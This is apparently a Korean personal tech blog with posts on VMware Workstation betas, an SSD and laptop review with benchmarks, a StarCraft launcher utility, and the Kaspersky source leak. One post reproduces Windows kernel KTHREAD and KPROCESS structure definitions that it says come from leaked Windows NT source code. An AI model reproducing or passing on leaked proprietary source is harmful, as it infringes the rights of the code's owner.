VMWare Team 으로부터 새로운 베타 소식지가 메일로 날아들었다.
Workstation 2011 Beta Binary가 릴리즈 되었다는 소식이다.
아직은 April 버젼으로써 최종 정식버젼이 릴리즈되려면 시간이 어느정도 소요될것 같다.
 
일단 , VMWare Team에서 공개한 이번 버젼의 특징을 몇가지만 살펴보자.

The VMware Workstation 2011 Beta includes several new features and hundreds of minor improvements. Some highlights include:

  • New User Interface – The user interface has been updated with new menus, toolbars, and an improved preferences screen, but that is just the beginning!
  • Remote Connections – “Connect to Server” feature allows remote connections to hosts running Workstation, ESX 4.x and Virtual Center.  Now workstation is a single interface to access all of the VMs you need regardless of where they reside!
  • “Share” your VMs – Share and permission VMs that can be accessed by other instances of Workstation.  This is a great way to run server operating systems in more production like environment.
  • Upload to vSphere - Integrated VMware’s OVFTool so you can drag and drop to upload a VM to vSphere.
  • Better “Teams” – Add team attributes to any VM without any of the drawbacks.  No longer forced to make a Team in order to manage multiple VMs together.
  • Enhanced Virtual Hardware – Faster graphics, improved vsmp, up to 64 GB of RAM per VM, USB 3.0, HD Audio and Bluetooth.
  • Much more….
 
* 새로운 GUI 인터페이스 도입. 메뉴, 툴바등의 인터페이스를 새롭게 변경했다고 한다. 아직은 초기단계이며, 시작의 일부라고 한다.
* 리모트 접속을 지원함으로써 , VM을 효율적으로 관리할수 있게 되었다. 기업체로써는 굉장히 좋은 기능인듯.
* VM을 Share할수 있는 기능을 제공한다. 즉, VM을 가져다쓸수 있다는것 같은데, 이것도 기업체 입장에서는 굉장히 좋은 옵션으로 적용될것 같다.
* VM을 vSphere에 업로드 할수있다는것 같은데,  vSphere를 써보지 않아서 잘 모르겠다.
* VM에 Team 속성을 부여할수 있어서, 더이상의 Team 구성으로 인한 불편함은 없다고 한다.
* Virtual Hardware의 퍼포먼스를 증가시켰다고 한다. 보다 빠른 그래픽처리, SMP 향상, VM당 최대 64기가까지 지원, USB3.0지원, HD오디오와 블루투스 지원 등.


Installation Changes and Enhanced Keyboards

The hardware requirements to install this version of Workstation have changed. Workstation now requires a relatively modern 64-bit CPU.

The keyboard filter driver is no longer installed by default. When the driver is not installed, the enhanced keyboard functionality is unavailable and you must press Ctrl-Alt-Ins instead of Ctrl-Alt-Del to exit the guest. To use the enhanced keyboard functionality, you must perform a custom installation and select the component. If you select the component, you must reboot whenever you install or uninstall Workstation. 

64비트 CPU는 필수적으로 필요하다고 한다. (이건 요즘엔 별로 문제되지 않는 내용이다.)
그리고 키보드 필터 드라이버는 더이상 기본값으로 설치되지 않는다고 하니, 보다 향상된 키보드 기능을 이용하려면 , 따로 설치해야한다고 한다.


인터페이스 부분을 살펴보니 , 크게 변화된것 같지는 않다.
조금 더 명확하고 깔끔하게 바뀌었다고 보면 될듯.

2011:04:10 15:29:07




OS 리스트에 Windows 8 Server도 존재하는데, 7.1.4-385536 부터 추가되었는지 아니면, 이번 April 2011 Beta부터 추가되었는지는 확실히 모르겠다.



이제 개발중반으로 접어드려는 단계일뿐이니, 정식버젼이 나오려면 더 기다려야될듯 하다.
http://www.vmware.com/betaprogram/WKST-2011-Beta (회원만 입장가능)







 
저작자 표시 비영리 변경 금지
신고
by Sone 2011.04.11 06:42
http://news.softpedia.com/news/Kaspersky-Anti-Virus-Source-Code-Leaked-Online-181297.shtml

마지막으로 수정된 날짜가 , 2007-2008년도 인것으로 봐서  Kaspersky Security Suite 8.0 인것으로 추측된다네요.
델파이와 C++로 작성되었으며,  안티바이러스 엔진, 안티피싱, 안티다이얼러, 안티스팸, 패런트컨트롤, 기타 모듈등이 포함되어져 있다는군요.

전 현업에 있어본적이 없어서 , 어떠한 경위로 유출이 되는지는 모르겠으나 내부자의 소행임은 분명하겠죠?
상황이 궁금하네요....
경쟁사에 어떠한 영향이 갈지도 궁금하구요..

유출된 소스를 이용해서 악성코드가 더 활개칠것은 뻔할거같네요.
저작자 표시 비영리 변경 금지
신고
by Sone 2011.01.30 11:09
  울트라씬을 사용하면서 시스템 성능이 전체적으로 저하된다는 느낌이 들었는데 , CPU나 메모리보다는 하드디스크쪽이 문제가 있다고 판단되서 ,  기존 320GB 5400RPM/8Mb HDD를 , S470 MZ-5PA128 128Gb로 교체하였습니다.

  인터넷을 검색해보니 S470 SSD에 대한 정보들은 타사 SSD에 비해서 그리 많은것 같지가 않아서 본 포스팅을 하게 되었습니다. 
특히  삼성 X170 모델을 사용하시는분들이 많이 계실테고, 그분들 중 SSD업그레이드를 고려하시는 분들이 많을거라 생각됩니다.
  본 포스팅은 전문적인 벤치마크를 다루는 글이 아닌, 비교적 평범한 내용을 다루기 때문에, 전문적인 정보를 찾으러오신분들께는 정보가 기대에 못 미칠수 있습니다.


SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/50sec | F/2.8 | 0.00 EV | 4.3mm | ISO-100 | Off Compulsory | 2010:11:20 12:09:38
풀박스 패키지 샷 - 정면
첫 인상은 상당히 깔끔해 보였습니다.


SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/30sec | F/2.8 | 0.00 EV | 4.3mm | ISO-200 | Off Compulsory | 2010:11:20 12:12:12
풀박스 패키지 샷 - 후면
스펙상으로는 Read 250Mb/s , Write 220Mb/s라고 하는데
실제로 측정해봐야 알수 있을듯 합니다.



SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/30sec | F/2.8 | 0.00 EV | 4.3mm | ISO-200 | Off Compulsory | 2010:11:20 12:29:43
  박스를 개봉할 때, 측면의 씰을 떼어내야 하는데, 떼어내면 위와 같이 개봉이 되었다는것을 나타내기 위해서 흔적이 남는데,
정교한 기술이 아닌 이상 리박싱은 힘들어보입니다.



SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/60sec | F/2.8 | 0.00 EV | 4.3mm | ISO-100 | Off Compulsory | 2010:11:20 12:31:23
SSD 정면 샷
알루미늄 재질의 바디를 채택해서 발열에도 신경을 나름 쓴것으로 보입니다.




SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/40sec | F/2.8 | 0.00 EV | 4.3mm | ISO-100 | Off Compulsory | 2010:11:20 12:31:53
SSD 후면 샷
FW는 기본적으로 AXM0601Q가 내장되어져 있는데, 이 글을 쓰는 시점에서는 0701Q로 업그레이드를 하고나서 이 글을 쓰고 있습니다.



SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/20sec | F/2.8 | 0.00 EV | 4.3mm | ISO-200 | Off Compulsory | 2010:11:20 12:32:15
SSD 측면 샷 1




SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/20sec | F/2.8 | 0.00 EV | 4.3mm | ISO-200 | Off Compulsory | 2010:11:20 12:32:40
SSD 측면 샷 2




SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/30sec | F/2.8 | 0.00 EV | 4.3mm | ISO-200 | Off Compulsory | 2010:11:20 12:33:33
  Samsung SSD Magician Toolkit을 받아라는 쪽지가 들어있었습니다.
TRIM등의 Performance Optimization 등을 수행하려면 Toolkit은 꼭 설치하여야겠습니다.




SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/30sec | F/2.8 | 0.00 EV | 4.3mm | ISO-120 | Off Compulsory | 2010:11:20 14:29:19
  SSD를 장착할 모델은 , NT-X170-PA40SE 모델입니다.
이 모델의 기본 스펙은 다음과 같습니다.

CPU : Intel Core2Duo SU7300 1.3Ghz
M/B : Intel GM45 / ICH9M
RAM : SAMSUNG DDR3 SDRAM 1066 2GB * 2
HDD : SAMSUNG HM320II 320GB(5400RPM / 8Mb)
VGA : Intel GMA X4500HD

HDD가 5400RPM에 버퍼메모리가 8메가밖에 안된다는것도 성능저하의 요인이 된다고 판단했습니다.


SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/40sec | F/2.8 | 0.00 EV | 4.3mm | ISO-100 | Off Compulsory | 2010:11:20 14:32:16
  NT-X170-PA40SE 모델은 하드디스크의 업그레이드를 용이하게 할수있게끔, 별도의 가이드 틀에 하드디스크를 고정하는 방식으로 되어져 있습니다.



SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/40sec | F/2.8 | 0.00 EV | 4.3mm | ISO-100 | Off Compulsory | 2010:11:20 14:56:29
  가이드에서 하드디스크를 떼어내었습니다. 사실 사진만 봐서는 쉽게 떼어낸것 같았지만,  하드디스크가 틀에 굉장히 세게 나사로 고정되어져 있어서, 드라이버를 2개정도 동원하고 손에 가죽장갑까지 끼고 , 두꺼운 스폰지, 두꺼운 옷까지 동원해서 엄청나게 힘을 주어서 겨우 하드디스크를 떼어낼 수 있었습니다. 덕분에 손에 한 두세군데가 세게 눌려서 피멍이 들었네요. 뜯다가 드라이버 끝이 다 벗겨져서 하마터면 삼성AS센터에 가서 하드디스크 떼어내달라고 할뻔했네요,...-_-



SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/30sec | F/2.8 | 0.00 EV | 4.3mm | ISO-160 | Off Compulsory | 2010:11:20 15:15:48
  기본 나사로는 SSD 고정이 안되더군요. (정해진 규격의 나사를 사용해야지 , 자기네들 제품에만 맞게끔 나사를 이상한걸 쓰면 되는가?) 어쩔수없이 테이프 신공을 썼습니다.  SSD라서 다행이지, 다른 하드디스크였다면 , 어떻게 됐을까요? 덕분에 저는 하드디스크 고정 나사를 잃어버리게 될 상황에 놓였네요. 제발 삼성에서 이런것좀 신경써줬으면 좋겠습니다.





  이제 장착을 마치고 본격 OS설치를 진행하고나서.....
그전에 , 기존 320GB 하드디스크와 얼마나 차이가 있는지 확인차원에서 , 320GB의 간단한 벤치를 미리 진행을 해보았습니다.


  앞서 말했다시피, 이 포스팅에서는 세세하게 하드웨어의 특성까지 고려해서 심도있게 벤치마크를 하는것이 아닌, 그저 일반적인 평범한 상황에서 간단하게 진행하는것임을 전제로 합니다. 또한 거의 대부분의 벤치는 Read Test만을 진행합니다. (Write Test는 노트북에서 진행하기에는 구조상 제한사항이 많습니다. SSD를 OS설치와는 별개로 분리해서 달아야하는데 그러기에는 힘들죠)




  먼저 Everest Disk Benchmark를 이용해서, Read Test Suite를 진행해보았습니다. 노트북에서는 데스크탑보다는 퍼포먼스가 약간 떨어지는것을 생각하면 전반적으로 평이한 수준입니다.



  다음으로 HD Tune Pro에서 Extra Read Test를 진행하였습니다. 역시나 Disk ARM을 기반으로 해서 기계적으로 움직이는 HDD는 Sequential access는 비교적 빠른 반면, Random access에서는 크게 느려질수밖에 없네요.



  HD Tune Random Access Time 또한 위에서 살펴본 결과와 크게 다르지 않습니다. 도트가 찍히는것만 봐도 하드디스크의 특성이 잘 드러납니다.



HD Tune Read Speed Test




CrystalDiskMark로 측정한 결과입니다. 수치는 언제든지 바뀔수 있기때문에 , 단순히 참고만 하도록 하면 되겠습니다.




이상하게, 윈도우7 스코어에서는 하드디스크 점수가 높게 나오더군요. 체감은 그렇지 않은데...






  이제 본격적으로 SSD의 성능을 살펴보도록 하겠습니다.
마찬가지로 Write Test는 진행할 수 없었으며, Read Test를 중점으로 진행하였습니다.





  첫번째로 CrystalDiskMark를 이용해서 간단히 측정해보았습니다. Crystal에서는 Write Test도 수행하고있는데, 단순 수치이니 참고용으로만 활용하면 되겠고, 전반적으로 HDD에 비해서 압도적으로 뛰어난 성능을 보여줍니다.





다음으로 Everest Disk Benchmark를 진행한 결과입니다. 마찬가지로 위의 Crystal 결과와 비슷한 수치를 보여줍니다.





  HD TUNE의 Extra Test 결과입니다. Random Seek에서 사이즈가 좀 큰 경우를 제외하고는  일정한 엑세스 타임을 보여줍니다.





  다음으로 Random Access를 측정한 결과인데 , 기계적인 움직임이 아닌, Digital Signal로 신호를 주고받는 형태이기 때문에, HDD와 같은 도트 모양(곡선 그래프) 은 절대 나올수가 없습니다.




  General Read Test를 수행한 결과로, 엑세스타임은 말할것도없고 , 파란색 파형을 살펴보면, 거의 200밑으로는 떨어지지 않음을 확인할 수 있습니다.






  윈도우7 스코어는 7.2점이 나왔는데, 실제 체감은 7.9점 만점을 줘도 될 정도입니다. 특히나 노트북 환경에서는 HDD와 비교했을 때, 체감성능이 확 올라가기 때문에, SSD를 염두에 두고 계시는분은 금전적으로 여유만 된다면 , 업그레이드를 하면 괜찮을것으로 생각됩니다.




* 호환성에 관한 문제 *
  일부 데스크탑 메인보드, 노트북 시스템에서 S470시리즈와 AHCI모드에서 호환성문제가 있는것으로 보여집니다.
특히나 저같은 경우는 , AHCI모드로 부팅을 시도할때 , AHCI 컨트롤러에서 S470을 인식하지 못합니다.
그래서 어쩔수없이 IDE모드로 사용중입니다만 , S470 구매를 고려하시는분은 , 사전에 철저하게 조사하고 구매하시기 바랍니다. 삼성SSD 컨트롤러 개발팀에서 개선좀 해주면 좋겠군요.

  그러나 제 주관적인 생각으로는 IDE와 AHCI의 차이는 NCQ의 지원여부밖에 없다고 생각되기 때문에 , SSD에서는 벤치상의 수치 차이는 있을지 몰라도 , 실제 체감 성능에서는 그 차이를 느끼기 힘듭니다. NCQ는 HDD의 Disk ARM의 움직임을 효율적으로 제어하는 기술이지 , SSD에는 해당사항이 없다고 생각되네요.

AXM08B1Q 버젼의 펌웨어에서 X170 AHCI컨트롤러와의 호환성 문제가 해결되었습니다.
저작자 표시 비영리 변경 금지
신고
by Sone 2010.11.29 22:28
최근에 삼성 울트라씬 모델에서 처음으로 윈도우7을 탑재한 모델이 출시가 되었다.
NT-X170-PA40SE , NT-X170-PA53B 가  그 주인공인데,

그 중에서도  6셀 배터리(8850mAh)를 기본으로 장착하고 있으면서  가격 대비 성능이 좋은  X170-PA40SE 모델에 대해서 간단히 써보고자 한다.


긴말 할것없이 ,  사양을 열거해보자면,

CPU : Intel Core 2 Duo SU7300 (1.3Ghz/FSB800/3Mb L2 Cache/Maximum Multiplier : x6.5)
RAM : Samsung DDR3 1066 4GB (2GB X 2 128bit Dual Channel )   
> 램의 최대 클럭은 533Mhz(1066) 이나 , 실효클럭은 400Mhz(800)로 작동한다.
HDD : 320GB (5400RPM/8Mb Buffer/SATA2)
VGA : Intel GMA X4500 HD (DX10지원/H264 가속 지원)
O/S : MS Windows 7 Home Premium K
IN/OUT Port : HDMI/D-Sub/Earphone/Mic/3-USB/DC-IN/100Mbps Ethernet








SAMSUNG Electronics | Anycall SPH-M4800 | Shutter priority | 0/0sec | F/4.3 | +0.71 EV | 0.0mm | Flash did not fire | 2009:11:03 12:58:39
수령 당시 박스의 모습.
노트북이 들어있는 박스와  , 레볼루션 2010 사은품이 담겨져 있는 박스로 분리되어져 있다.





SAMSUNG Electronics | Anycall SPH-M4800 | Shutter priority | 0/0sec | F/4.3 | +0.71 EV | 0.0mm | Flash did not fire | 2009:11:03 13:01:17
사은품 박스안에는 4Gb USB , 무선마우스, 마우스패드 등이 제공된다.





SAMSUNG Electronics | Anycall SPH-M4800 | Shutter priority | 0/0sec | F/4.3 | +0.71 EV | 0.0mm | Flash did not fire | 2009:11:03 13:03:15
노트북 박스를 열어보면  AC어댑터, 케이블 , 데이터케이블(PC간), 배터리, 파우치 등이 들어있다.





SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/30sec | F/2.8 | 0.00 EV | 4.3mm | ISO-160 | Off Compulsory | 2009:11:05 14:55:39
상판의 모습.
구매 후 먼저 확인할 것은 외관의 이상유무일 것이다.
기스 등이나 지워지지 않는 오염물질 등이 붙어있는지 확인.





SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/20sec | F/2.8 | 0.00 EV | 4.3mm | ISO-200 | Off Compulsory | 2009:11:05 14:55:51
X170모델의 두께는 이정도라고 보면 될듯 하다.
현재 사용중인 다른 노트북인 Q70/A2 모델에 비하면 두께는 엄청 얇은 수준.
왼쪽에는 메모리카드리더기이고 , 오른쪽은 전원ON/OFF




SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/15sec | F/2.8 | 0.00 EV | 4.3mm | ISO-200 | Off Compulsory | 2009:11:05 14:56:11
노트북 왼쪽편.
DC-IN, D-sub , Ethernet,  HDMI 단자, 환풍구가 보인다.
왼쪽 아래에 약간 튀어나온것은 6셀 배터리 부분이다.





SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/25sec | F/2.8 | 0.00 EV | 4.3mm | ISO-200 | Off Compulsory | 2009:11:05 14:56:58
노트북 후면부.
6셀 배터리가 약간 튀어나와있지만 절대 지장이 있을 정도는 아닌듯.
6셀 때문에 AC어댑터를 들고다닐 필요가 없어졌다.
(물론 장시간 사용자는 필요할듯)





SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/15sec | F/2.8 | 0.00 EV | 4.3mm | ISO-200 | Off Compulsory | 2009:11:05 14:57:24
노트북 우측 부분.
오디오 입출력 포트와 , 3USB단자가 보인다.




SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/30sec | F/2.8 | 0.00 EV | 4.3mm | ISO-160 | Off Compulsory | 2009:11:05 14:57:40
윈도우7 홈프리미엄 한글판이 설치되있음을 알리는 라이센스 라벨이 보인다.
하드, 메모리 등의 업그레이드는 나사만 풀면 가능하다.







SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/30sec | F/2.8 | 0.00 EV | 4.3mm | ISO-160 | Off Compulsory | 2009:11:05 14:59:10
전체 풀샷





SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/40sec | F/2.8 | 0.00 EV | 4.3mm | ISO-100 | Off Compulsory | 2009:11:05 14:59:35
터치패드는 멀티 터치패드로 진화하였지만 , 크게 메리트가 있을만한 기능은 없다.





SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/40sec | F/2.8 | 0.00 EV | 4.3mm | ISO-100 | Off Compulsory | 2009:11:05 16:42:02
PA40SE 모델과  , Q70/A2 모델.
A2모델은 Vertex SSD 64GB가 장착되어져 있는데,
PA40SE는 ODD 확장 슬롯이 없어서 320과 SSD를 동시에 쓰지는 못하겠고,
나중에 고려해봐야겠다.

이제 휴대 시스템이 2대가 생겼으니,
USB로 연결해서  실제 시스템의 커널을 디버깅할 수 있는 좋인 기회인것 같다.




2009:11:06 20:53:53
휴대성이 강한 모델 치고는 좋은 성능을 보여준다.
일단 듀얼코어라서 CPU가 한번에 2개의 쓰레드를 실행할 수 있는것은
아톰에 비해서 큰 성능 향상임은 분명하다.



저작자 표시 비영리 변경 금지
신고
by Sone 2009.11.06 20:56

근본적인 화면 깨짐을 해결하는 방법은 ,
스누피 님의 블로그(
http://snoopybox.co.kr/1083) 에서 얻어왔고,
이 프로그램은 이것을 토대로 제작됐음을 미리 밝힙니다.


* 이 프로그램의 용도 *
explorer.exe를 좀더 Safety 하게 Terminate 시킨뒤,
스타크래프트를 자동으로 실행시켜주는 프로그램입니다.
스타크래프트 플레이를 마치고 starcraft.exe가 종료되면 , explorer.exe가 자동적으로 실행됩니다.


* 프로그램 작성 배경 *
taskkill 이나  TerminateProcess API 함수를 이용하여 , 한창 실행중에 있는 프로세스를 종료시키면,
상황에 따라  Heap 영역등의  리소스가 제대로 반환되지 않는 문제점이 있기때문에
그것을 조금이나마 해결하고자 작성된 간단한 프로그램입니다.

(TerminateProcess API는 따로 리소스 반환 과정을 거치지 않고  , 
바로 NtTerminateProcess Native API를 호출합니다.



* 사용법 *
1. StarLdr.exe를 스타크래프트가 설치된 폴더에 집어넣습니다.(예 : C:\Program Files\StarCraft)
2. StarLdr.exe를 실행합니다.


* 주의 사항 *
1. 이 프로그램은 Microsoft Windows NT 6.0 ~ NT 6.1 에서만 실행이 가능합니다.
2. 프로그램이 실행되지 않을 경우 , vcredist_x86.exe 를 다운받아서 설치합니다.

CRC32: BE19814C
MD5: 391D0733EAFA42772A999E9CC2D6A49E
SHA-1: 9FDA31A9B086CBFCB4F04840A1880D3D1F50AC4E

위 값과 일치하지 않는 파일은 모두 가짜거나 , 임의로 조작된 파일입니다.



저작자 표시 비영리 변경 금지
신고
by Sone 2009.10.24 05:35

Try out these New Features:

  • Aero support for Windows 7 and Vista Guests!
  • Windows 7 support (as a Host and Guest OS)
  • OpenGL and Shader Model 3.0 support for Windows guests
  • Create guests with Multi-core or 4-way CPUs and up to 32GB of Memory
  • Download VMware vSphere 4 and install ESX as a guest OS to try out the latest features.
  • Dynamically Download the latest VMware Tools package only when you need it.
  • Print from your VM without installing printer drivers. Virtual Printing courtesy of our friends at ThinPrint.
  • Automatically create snapshots on scheduled intervals with AutoProtect.
  • Secure your Virtual Machines with 256-bit encryption.
  • Remote Replay Debugging and other advanced development features
  • ALSA Sound support on Linux hosts enables multiple VMs to play "music" concurrently.
  • Instantly pause a VM to free up system resources or dedicate horsepower to other running VMs.
  • The Virtual Network Editor user interface has been redesigned for Windows users.


(for Windows Systems) 
  Latest Released Version: RC - Oct '09 | 10/02/09 | 197124 

Workstation for Windows 32-bit and 64-bit without Tools
.exe Installation file for 32-bit and 64-bit Windows
  345 MB Windows 32-bit and 64-bit .exe
(md5sum:f0e3f037913db6932c84674796b3e54f)
(sha1sum:cdbd80bcaf158f28613eeb175614eeebf68e3c8f)
Workstation for Windows 32-bit and 64-bit with Tools
.exe Installation file for 32-bit and 64-bit Windows
  522 MB Windows 32-bit and 64-bit .exe
(md5sum:85a04b0d255b2969612d1c3ec7bdc92a)
(sha1sum:b184e20be674726fef4434c4b8fc14a095a0735e)

저작자 표시 비영리 변경 금지
신고
by Sone 2009.10.09 23:26

Latest Released Version: Tech Preview Aug09 | 08/21/09 | 185517


Workstation for Windows 32-bit and 64-bit
.exe Installation file for 32-bit and 64-bit Windows
  345 MB Windows 32-bit and 64-bit .exe
(md5sum:f35da33a0a0cf9d79e6a9bb79c153295)
(sha1sum:f3ac6ece0e73d75b082c670f7840f6f2f60cc3da)

Try out these New Features:

  • Aero support for Windows 7 and Vista Guests!
  • Windows 7 support (as a Host and Guest OS)
  • OpenGL and Shader Model 3.0 support for Windows guests
  • Create guests with Multi-core or 4-way CPUs and up to 32GB of Memory
  • Download VMware vSphere 4 and install ESX as a guest OS to try out the latest features.
  • Dynamically Download the latest VMware Tools package only when you need it.
  • Print from your VM without installing printer drivers. Virtual Printing courtesy of our friends at ThinPrint.
  • Automatically create snapshots on scheduled intervals with AutoProtect.
  • Secure your Virtual Machines with 256-bit encryption.
  • Remote Replay Debugging and other advanced development features
  • ALSA Sound support on Linux hosts enables multiple VMs to play "music" concurrently.
  • Instantly pause a VM to free up system resources or dedicate horsepower to other running VMs.
  • The highly acclaimed Linux Virtual Network Editor user interface has been implemented for Windows users.
저작자 표시 비영리 변경 금지
신고
by Sone 2009.08.23 23:16





소스코드 용량이 대략 600여 Mb 정도 되는데 ,  윈도우NT 계열 OS에서 사용되고 있는  커널 오브젝트 구조체도 다 나와 있는것 같다.
(물론 현재 사용중인 XP와 같은지는 알수없다.)

아래는  쓰레드 커널 구조체를 나타낸 내용이다.
물론  Windbg 에서도 볼수있지만 ,   멤버가 이렇게 자세히 나오지는 않는듯




typedef struct _KTHREAD {

    //
    // The dispatcher header and mutant listhead are fairly infrequently
    // referenced, but pad the thread to a 32-byte boundary (assumption
    // that pool allocation is in units of 32-bytes).
    //

    DISPATCHER_HEADER Header;
    LIST_ENTRY MutantListHead;

    //
    // The following fields are referenced during trap, interrupts, or
    // context switches.
    //
    // N.B. The Teb address and TlsArray are loaded as a quadword quantity
    //      on MIPS and therefore must be on a quadword boundary.
    //

    PVOID InitialStack;
    PVOID StackLimit;
#if defined(_IA64_)
    PVOID InitialBStore;
    PVOID BStoreLimit;
#endif
    PVOID Teb;
    PVOID TlsArray;
    PVOID KernelStack;
#if defined(_IA64_)
    PVOID KernelBStore;
#endif
    BOOLEAN DebugActive;
    UCHAR State;
    BOOLEAN Alerted[MaximumMode];
    UCHAR Iopl;
    UCHAR NpxState;
    CHAR Saturation;
    SCHAR Priority;
    KAPC_STATE ApcState;
    ULONG ContextSwitches;

    //
    // The following fields are referenced during wait operations.
    //

    LONG_PTR WaitStatus;
    KIRQL WaitIrql;
    KPROCESSOR_MODE WaitMode;
    BOOLEAN WaitNext;
    UCHAR WaitReason;
    PRKWAIT_BLOCK WaitBlockList;
    LIST_ENTRY WaitListEntry;
    ULONG WaitTime;
    SCHAR BasePriority;
    UCHAR DecrementCount;
    SCHAR PriorityDecrement;
    SCHAR Quantum;
    KWAIT_BLOCK WaitBlock[THREAD_WAIT_OBJECTS + 1];
    PVOID LegoData;
    ULONG KernelApcDisable;
    KAFFINITY UserAffinity;
    BOOLEAN SystemAffinityActive;
    UCHAR PowerState;
    UCHAR NpxIrql;
    UCHAR Pad[1];
    PVOID ServiceTable;
//    struct _ECHANNEL *Channel;
//    PVOID Section;
//    PCHANNEL_MESSAGE SystemView;
//    PCHANNEL_MESSAGE ThreadView;

    //
    // The following fields are referenced during queue operations.
    //

    PRKQUEUE Queue;
    KSPIN_LOCK ApcQueueLock;
    KTIMER Timer;
    LIST_ENTRY QueueListEntry;

    //
    // The following fields are referenced during read and find ready
    // thread.
    //

    KAFFINITY Affinity;
    BOOLEAN Preempted;
    BOOLEAN ProcessReadyQueue;
    BOOLEAN KernelStackResident;
    UCHAR NextProcessor;

    //
    // The following fields are referenced during system calls.
    //

    PVOID CallbackStack;
#if defined(_IA64_)
    PVOID CallbackBStore;
#endif
    PVOID Win32Thread;
    PKTRAP_FRAME TrapFrame;
    PKAPC_STATE ApcStatePointer[2];
    CCHAR PreviousMode;
    UCHAR EnableStackSwap;
    UCHAR LargeStack;
    UCHAR ResourceIndex;

    //
    // The following entries are referenced during clock interrupts.
    //

    ULONG KernelTime;
    ULONG UserTime;

    //
    // The following fields are referenced during APC queuing and process
    // attach/detach.
    //

    KAPC_STATE SavedApcState;
    BOOLEAN Alertable;
    UCHAR ApcStateIndex;
    BOOLEAN ApcQueueable;
    BOOLEAN AutoAlignment;

    //
    // The following fields are referenced when the thread is initialized
    // and very infrequently thereafter.
    //

    PVOID StackBase;
    KAPC SuspendApc;
    KSEMAPHORE SuspendSemaphore;
    LIST_ENTRY ThreadListEntry;

    //
    // N.B. The below four UCHARs share the same DWORD and are modified
    //      by other threads. Therefore, they must ALWAYS be modified
    //      under the dispatcher lock to prevent granularity problems
    //      on Alpha machines.
    //

    CCHAR FreezeCount;
    CCHAR SuspendCount;
    UCHAR IdealProcessor;
    UCHAR DisableBoost;

} KTHREAD, *PKTHREAD, *RESTRICTED_POINTER PRKTHREAD;







멤버 변수가 엄청 많다  -_-;;;; 저것들이 다 쓰이다니..참 복잡하긴 복잡하구나 

다음으로  프로세스 커널 오브젝트 구조체







typedef struct _KPROCESS {

    //
    // The dispatch header and profile listhead are fairly infrequently
    // referenced, but pad the process to a 32-byte boundary (assumption
    // that pool block allocation is in units of 32-bytes).
    //

    DISPATCHER_HEADER Header;
    LIST_ENTRY ProfileListHead;

    //
    // The following fields are referenced during context switches.
    //

    ULONG_PTR DirectoryTableBase[2];

#if defined(_X86_)

    KGDTENTRY LdtDescriptor;
    KIDTENTRY Int21Descriptor;
    USHORT IopmOffset;
    UCHAR Iopl;
    BOOLEAN VdmFlag;

#endif

#if defined(_IA64_)

    KGDTENTRY LdtDescriptor;
    ULONGLONG UnscrambledLdtDescriptor;
    KIDTENTRY Int21Descriptor;
    BOOLEAN VdmFlag;

    REGION_MAP_INFO ProcessRegion;
    REGION_MAP_INFO SessionRegion;
    PREGION_MAP_INFO SessionMapInfo;
    ULONG_PTR SessionParentBase;

#endif // _IA64_

#if defined(_ALPHA_)

    union {
        struct {
            KAFFINITY ActiveProcessors;
            KAFFINITY RunOnProcessors;
        };

        ULONGLONG Alignment;
    };

    ULONGLONG ProcessSequence;
    ULONG ProcessAsn;

#else

    KAFFINITY ActiveProcessors;

#endif

    //
    // The following fields are referenced during clock interrupts.
    //

    ULONG KernelTime;
    ULONG UserTime;

    //
    // The following fields are referenced infrequently.
    //

    LIST_ENTRY ReadyListHead;
    LIST_ENTRY SwapListEntry;
    LIST_ENTRY ThreadListHead;
    KSPIN_LOCK ProcessLock;
    KAFFINITY Affinity;
    USHORT StackCount;
    SCHAR BasePriority;
    SCHAR ThreadQuantum;
    BOOLEAN AutoAlignment;
    UCHAR State;
    UCHAR ThreadSeed;
    BOOLEAN DisableBoost;
    UCHAR PowerState;
    BOOLEAN DisableQuantum;
    UCHAR Spare[2];
} KPROCESS, *PKPROCESS, *RESTRICTED_POINTER PRKPROCESS;




위 내용 말고도   ,  NTHALAPI , Ke함수 , Ps함수 , Se 함수 등등 선언이 다 되어있는것을 볼수있다.
커널쪽 공부하시는 분들은 보셔도 좋을듯...
(단 , 유출된 소스코드는 15%정도에 불과하다고 한다.)

저작자 표시 비영리 변경 금지
신고
by Sone 2009.07.07 21:36
* 본 포스트는 2008/06/30 20:41  주인장의 네이버 블로그에 썼던 내용을 그대로 가져왔음을 밝힙니다. 



몇달 전까지 , 
펜티엄 듀얼코어 E2160 1.8Ghz  CPU를  3.2Ghz로  오버클럭해서 사용하였다.

 

